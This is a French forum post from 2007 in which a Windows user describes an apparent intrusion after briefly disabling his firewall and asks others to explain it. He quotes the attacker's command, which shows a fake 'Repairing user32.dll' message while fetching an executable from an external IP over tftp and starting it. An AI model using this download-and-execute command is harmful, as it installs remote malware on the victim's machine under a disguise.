Bonjour,
Il y a 1/2h j'étais tranquille chez moi en train de surfer sous Windows, Je désactive mon firewall ZoneAlarm 2 min histoire de laisser un flux, puis d'un coups au bout de 5 min ya la fenetre "Executer" qui sort, puis l'invite de commande qui suit, puis la fenetre rechercher, et enfin la fenetre qui liste les processus et leur acitivité... Je réfléchis 1.3s en essayant de fermer la fenetre de l'invite de commande ou il y avait écrit:
Repairing user32.dll
Please wait...
La je me rend compte qu'il y avait un truc qui allait pas, le temps de me jeter sur le switch et débrancher le cable réseau du PC. Et par magie, tout s'arrête. Je regarde donc avec calme ce qu'il y avait été écrit dans les différentes fenêtres:
%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 209.5.242.245 GET gjggpqz.exe & start gjggpqz&
dans la feneter "Executer". D'ou le "Repairing user32.dll - Please wait..."
après la commande tftp: j'imagine que c pour telecharger le fichier gjggpqz.exe depuis l'IP 209.5.242.245 qui apparemment se trouve au Canada, puis de lancer l'application.
Là du coup j'ai redémarrer sous LINUX et rebranché le cable reseau
Avez-vous déjà vu ce type de manoeuvres?? Qu'est-ce qui a été fait ou qu'est-ce qu'on a tenté de faire?
Merci beaucoup
Message édité par cherkan1 le 09-07-2007 à 09:53:50